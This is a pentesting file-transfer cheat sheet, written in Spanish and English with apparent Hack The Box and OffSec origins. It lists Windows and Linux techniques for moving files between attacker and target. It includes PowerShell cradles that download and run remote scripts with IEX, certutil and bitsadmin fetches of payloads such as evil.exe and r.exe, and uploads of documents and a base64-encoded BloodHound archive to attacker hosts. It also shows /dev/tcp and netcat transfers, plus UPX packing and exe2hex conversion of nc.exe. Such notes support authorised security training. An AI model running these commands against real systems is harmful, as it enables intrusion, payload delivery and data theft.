FileTransfer
File Transfer CheatSheet 
Notas para transferir archivos en distintos escenarios y con distintas herramientas.
Windows
Download
PS C:\Users\htb\Desktop> (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.213/lala.txt','C:\Users\htb\Desktop\lala.txt')
PS C:\Users\htb\Desktop> Invoke-WebRequest http://192.168.0.213/lala.txt -OutFile lala.txt
PS C:\Users\htb\Desktop> Invoke-RestMethod http://192.168.0.213/lala.txt -OutFile "C:\Users\htb\Desktop\lala.txt"
PS C:\Users\htb\Desktop> IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.213/lala.ps1')
PS C:\Users\htb\Desktop> Invoke-WebRequest http://192.168.0.213/lala.ps1 | iex
Bypass Internet Explorer’s First Run customization or use cradles
PS C:\Users\htb\Desktop> Invoke-WebRequest http://192.168.0.213/lala.ps1 -UseBasicParsing | iex
C:\htb> reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2
bitsadmin /transfer TRANSFEREXAMPLE http://192.168.0.213/lala.txt C:\Users\htb\Desktop\lala.txt
bitsadmin /transfer job /download /priority high http://192.168.49.169/r.exe c:\\pwn\\r.exe
PS C:\> Import-Module bitstransfer;Start-BitsTransfer -Source "http://192.168.0.213/lala.txt" -Destination "C:\Users\htb\Desktop\lala.txt"
CertUtil & base64 decode file
#Encode
C:\Users\htb\Desktop>certutil.exe -encode lala.zip lala_encode.txt
#Download
C:\Users\htb\Desktop>certutil.exe -urlcache -split -f "http://192.168.0.213/encode.txt" encode.txt
#Decode
C:\Users\htb\Desktop>certutil.exe -decode encode.txt decode.zip
FTP Script
#ftp-script.txt
open 192.168.0.210
USER lorka
lala
bin
get lala.txt
bye
#Transfer with ftp script
PS C:\Users\htb\Desktop> ftp -v -n -s:ftp-script.txt
TFTP
#Enable TFTP (required admin rights)
PS C:\WINDOWS\system32> DISM /online /Enable-Feature /FeatureName:TFTP
#GET file
PS C:\Users\htb\Desktop> tftp 192.168.0.210 get lala.txt
JavaScript
#down.js
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
#Execute
C:\Users\htb\Desktop>cscript /nologo down.js http://192.168.0.213/lala.txt lala.txt
VBScript
#down.vbs
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile WScript.Arguments.Item(1), 2
end with
#Execute
C:\Users\htb\Desktop>cscript /nologo down.vbs http://192.168.0.213/lala.txt lala.txt
strUrl = WScript.Arguments.Item(0)
StrFile = WScript.Arguments.Item(1)
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts
Err.Clear
Set http = Nothing
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")
http.Open "GET", strURL, False
http.Send
varByteArray = http.ResponseBody
Set http = Nothing
Set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.CreateTextFile(StrFile, True)
strData = ""
strBuffer = ""
For lngCounter = 0 to UBound(varByteArray)
ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))
Next
ts.Close
#Execute
C:\Users\Offsec> cscript wget.vbs http://10.11.0.4/evil.exe evil.exe
Upload
System.Net.WebClient
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
#make dir & permission
$ mkdir -p /var/www/uploads
$ chown www-data: /var/www/uploads
C:\Users\Offsec> powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')
PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'c:/users/public/downloads/BloodHound.zip' -Encoding Byte))
PS C:\htb> Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64
PS C:\Users\htb\Desktop> Start-BitsTransfer "C:\Users\htb\Desktop\lala.txt" -Destination "http://10.129.215.180/lala.tx" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential DOMAIN\username
SCP
PS C:\Users\Administrador\Desktop> scp .\lala.txt root@192.168.0.213:/root/
WebServer
Windows Server IIS (need admin rights)
PS C:\Users\administrator> Add-WindowsFeature Web-Server, Web-Mgmt-Tools
#server path: C:\inetpub\wwwroot>
CipherFiles
function Invoke-AESEncryption {
[CmdletBinding()]
[OutputType([string])]
Param
(
[Parameter(Mandatory = $true)]
[ValidateSet('Encrypt', 'Decrypt')]
[String]$Mode,
[Parameter(Mandatory = $true)]
[String]$Key,
[Parameter(Mandatory = $true, ParameterSetName = "CryptText")]
[String]$Text,
[Parameter(Mandatory = $true, ParameterSetName = "CryptFile")]
[String]$Path
)
Begin {
$shaManaged = New-Object System.Security.Cryptography.SHA256Managed
$aesManaged = New-Object System.Security.Cryptography.AesManaged
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
}
Process {
$aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key))
switch ($Mode) {
'Encrypt' {
if ($Text) {$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($Text)}
if ($Path) {
$File = Get-Item -Path $Path -ErrorAction SilentlyContinue
if (!$File.FullName) {
Write-Error -Message "File not found!"
break
}
$plainBytes = [System.IO.File]::ReadAllBytes($File.FullName)
$outPath = $File.FullName + ".aes"
}
$encryptor = $aesManaged.CreateEncryptor()
$encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
$encryptedBytes = $aesManaged.IV + $encryptedBytes
$aesManaged.Dispose()
if ($Text) {return [System.Convert]::ToBase64String($encryptedBytes)}
if ($Path) {
[System.IO.File]::WriteAllBytes($outPath, $encryptedBytes)
(Get-Item $outPath).LastWriteTime = $File.LastWriteTime
return "File encrypted to $outPath"
}
}
'Decrypt' {
if ($Text) {$cipherBytes = [System.Convert]::FromBase64String($Text)}
if ($Path) {
$File = Get-Item -Path $Path -ErrorAction SilentlyContinue
if (!$File.FullName) {
Write-Error -Message "File not found!"
break
}
$cipherBytes = [System.IO.File]::ReadAllBytes($File.FullName)
$outPath = $File.FullName -replace ".aes"
}
$aesManaged.IV = $cipherBytes[0..15]
$decryptor = $aesManaged.CreateDecryptor()
$decryptedBytes = $decryptor.TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16)
$aesManaged.Dispose()
if ($Text) {return [System.Text.Encoding]::UTF8.GetString($decryptedBytes).Trim([char]0)}
if ($Path) {
[System.IO.File]::WriteAllBytes($outPath, $decryptedBytes)
(Get-Item $outPath).LastWriteTime = $File.LastWriteTime
return "File decrypted to $outPath"
}
}
}
}
End {
$shaManaged.Dispose()
$aesManaged.Dispose()
}
}
#Import Module
PS C:\Users\htb\Desktop> Import-Module Invoke-AESEncryption.ps1
#Encrypt file
PS C:\Users\htb\Desktop> Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\lala.txt
#Decrypt file
PS C:\Users\htb\Desktop> Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\lala.txt.aes
Linux
Download
[root@htb Downloads]# wget http://192.168.0.213/lala.txt -O lala.txt
[root@htb Downloads]# curl -o lala.txt http://192.168.0.213/lala.txt
#Primero creamos un certificado
$ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
#Origen
$ openssl s_server -quiet -accept 7788 -cert certificate.pem -key key.pem < lala.txt
#Destino
$ openssl s_client -connect 192.168.0.213:7788 -quiet > lala.txt
***Encrypt and decrypt with openssl***
#encrypt
[root@htb]# openssl enc -base64 -in lala.txt -out lala_encode.txt
#decrypt
[root@htb]# openssl enc -base64 -d -in lala_encode.txt -out lala.txt
Bash Method Script
#!/usr/bin/env bash
HOST="192.168.0.213"
FILE="lala.txt"
exec 3<>/dev/tcp/${HOST}/80
{
echo GET /${FILE} HTTP/1.1
echo connection: close
echo host: ${HOST}
echo
} >&3
cat <&3
PHP
[root@htb Downloads]# php -r '$file = file_get_contents("http://192.168.0.213/lala.txt"); file_put_contents("lala.txt",$file);'
[root@htb Downloads]# php -r 'const BUFFER = 1024; $fremote = fopen("http://192.168.0.213/lala.txt", "rb"); $flocal = fopen("lala.txt", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
[root@htb Downloads]# php -r '$lines = @file("http://192.168.0.213/lala.txt"); foreach ($lines as $line_num => $line) { echo $line; }' > lala.txt
Python2
#!/usr/bin/env python2
from urllib import request
request.urlretrieve("http://192.168.0.213/lala.txt", "lala.txt")
Python3
#!/usr/bin/env python3
import urllib.request
urllib.request.urlretrieve("http://192.168.0.213/lala.txt", "lala.txt")
Ruby
[root@htb Downloads]# ruby -e 'require "net/http"; File.write("lala.txt", Net::HTTP.get(URI.parse("http://192.168.0.213/lala.txt")))'
Perl
[root@htb Downloads]# perl -e 'use LWP::Simple; getstore("http://192.168.0.213/lala.txt", "lala.txt");'
Go
//usr/bin/env go run $0 "$@"; exit
package main
import (
"os"
"io"
"net/http"
)
func main() {
lfile, err := os.Create("lala.txt")
_ = err
defer lfile.Close()
rfile := "http://192.168.0.213/lala.txt"
response, err := http.Get(rfile)
defer response.Body.Close()
io.Copy(lfile, response.Body)
}
Base64
#Origen
[root@htb Descargas]# base64 upload_nix.zip
UEsDBAoAAAAAAEqEKVFRlJcKIAAAACAAAAAOAAAAdXBsb2FkX25peC50eHQwNDgwOTBiYzdlZDA0
Zjc1ODY1ODk3NWRmOGY4NjJjOFBLAQI/AAoAAAAAAEqEKVFRlJcKIAAAACAAAAAOACQAAAAAAAAA
IAAAAAAAAAB1cGxvYWRfbml4LnR4dAoAIAAAAAAAAQAYAHGdOpjohtYB0cK75fqG1gHXv2od5obW
AVBLBQYAAAAAAQABAGAAAABMAAAAAAA=
#Destino
htb-student@nix04:~$ echo "UEsDBAoAAAAAAEqEKVFRlJcKIAAAACAAAAAOAAAAdXBsb2FkX25peC50eHQwNDgwOTBiYzdlZDA0Zjc1ODY1ODk3NWRmOGY4NjJjOFBLAQI/AAoAAAAAAEqEKVFRlJcKIAAAACAAAAAOACQAAAAAAAAAIAAAAAAAAAB1cGxvYWRfbml4LnR4dAoAIAAAAAAAAQAYAHGdOpjohtYB0cK75fqG1gHXv2od5obWAVBLBQYAAAAAAQABAGAAAABMAAAAAAA=" | base64 -d -w 0 > upload_nix.zip
Netcat
**Method1**
#Origen
[root@htb]# nc -lvnp 7788 < lala.txt
#Destino
[user@target]# cat < /dev/tcp/192.168.0.213/7788 > lala.txt
**Method2**
#Origen
[root@htb]# nc 192.168.0.210 7788 < lala.txt
#Destino
[user@target]# nc -lnvp 7788 > lala.txt
SCP
[root@htb ~]# scp root@192.168.0.213:/root/lala.txt lala.txt
Upload
SCP
#Normal transfer
[root@htb]# scp lala.txt user@192.168.0.213:/dir/path/
#Con certificado
[root@htb]# scp -i cert.pem lala.txt user@192.168.0.213:/root/
RDP
#Compartir carpeta por RDP
[root@htb ~]# rdesktop 192.168.0.138 -r disk:linux='/root'
SMB
Impacket SMBserver
#SERVER
impacket-smbserver -username lorka -password lala -smb2support SERVER $(pwd)
impacket-smbserver -smb2support SERVER $(pwd)
#CLIENT (with creds)
net use x: \\10.10.10.22\SERVER /user:lorka lala
copy x:\file.exe
WebServer
Python2
[root@htb]# python -m SimpleHTTPServer 7788
Python3
[root@htb]# python3 -m http.server 7788
Ruby
[root@htb]# ruby -run -ehttpd . -p7788
PHP
[root@htb]# php -S 0.0.0.0:7788
FTP Server
#Install lib
[root@htb ~]# pip3 install pyftpdlib
#Run Server
[root@htb ~]# python3 -m pyftpdlib --user=lorka --password=lalala -w -p 21
Misc
upx
[root@htb]# upx -9 file.exe
exe2hex
[root@htb]# exe2hex -x nc.exe -o nc.cmd